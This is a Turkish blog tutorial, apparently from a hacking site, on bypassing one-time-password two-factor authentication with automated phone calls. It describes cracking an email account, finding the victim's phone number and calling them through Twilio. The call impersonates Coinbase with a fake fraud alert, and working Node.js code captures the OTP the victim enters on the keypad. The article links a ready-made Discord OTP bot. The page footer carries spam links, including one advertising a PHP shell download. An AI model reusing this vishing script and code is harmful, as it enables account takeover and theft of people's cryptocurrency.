?‍? IVR ile OTP Bypass Nasıl Yapılır?

Bu makalemizde profesyonel şekilde IVR hizmetlerini kullanarak ?OTP (one-time-password) yada diğer adıyla iki adımlı doğrulama kullanan hesaplara yada sistemlere gireceğinizi anlatacağım. Yapacağımız işlem sosyal mühendislik olsa da diğer yöntemlere göre başarı oranı çok yüksek diyebilirim. İlk önce bir IVR hizmeti veren bir firmadan api almamız lazım. Twilio bu yapacağımız işlem için güzel makalenin sonunda Twilio için yazılmış bir Discord botu da vereceğim. Siz Twilio yerine farklı apilerde kullanabilirsiniz fark etmez.

Şimdi örnek olarak son dönemlerde bu yöntem ile genellikle coinbase hesapları hackleniyor ve boşaltılıyor. Bizde bu olay üzerinden bir örnek ile gidelim. Mail hesaplarını checkleyen bir arkadaşın hikayesi olsun bu da;

Saldırgan ilk önce mail checker ile coinbase keyword içeren bir mail hesabı crackliyor.

Ekran görüntüsü bize ait değildir.

Hesaba giriş yapmaya çalışıyor ama giriş yapmak için hesabın sahibine gönderilen doğrulama kodunu öğrenmesi bulması lazım.

Phone Verify Issue - Authenticator code not working and not receiving SMS/Text.  Please Help!: CoinBase
Ekran görüntüsü bize ait değildir.

Mail hesabından kullanıcının telefon numarasını öğreniyor. Twilio ile o numaraya arama başlatıyor.

app.post('/coinbase', (request, response) => {
    // Use the Twilio Node.js SDK to build an XML response
    const twiml = new VoiceResponse();

    // Use the <Gather> verb to collect user input
    const gather = twiml.gather({
        action: '/gather',
        method: 'POST',
        input: 'dtmf',
        numDigits: 6,
    });
    gather.say("Automated Alert from Coinbase. Your account has sent 250$ to an insecure and fraudulent address. Please provide the one time passcode we just sent you in the dialpad.")

    response.type('text/xml');
    response.send(twiml.toString());
});

Bot aramayı başlatıyor sonra karşı taraf telefonu açtıktan sonra sesli olarak hedef kişi şunları duyuyor 😀 ” Automated Alert from Coinbase. Your account has sent 250$ to an insecure and fraudulent address. Please provide the one time passcode we just sent you in the dialpad.” bunu duyan kurban ? hemen doğrulama kodunu tuş takımından ? giriyor ve kod panelimize geliyor. ?

Ekran görüntüsü bize ait değildir.

Discord Bot: https://github.com/SirTenzin/OTP-Bot

Twilio API Dökümanları: https://www.twilio.com/docs/voice

2 Yorum

Bir cevap yazın

E-posta hesabınız yayımlanmayacak.

Başa dön tuşu
hacklink al hd film izle php shell indir siber güvenlik Ankara evden eve nakliyat Ankara evden eve nakliyat türkçe anime izle Fethiye Escort Fethiye Escort Marmaris Escort nulled scriptFethiye Escortdeneme bonusuotomatik kepenk servisikusadasi escorttravestihovarda girişxhamstersex geschichtenpornobrazzerssex storiesxnxxxnxxxnxx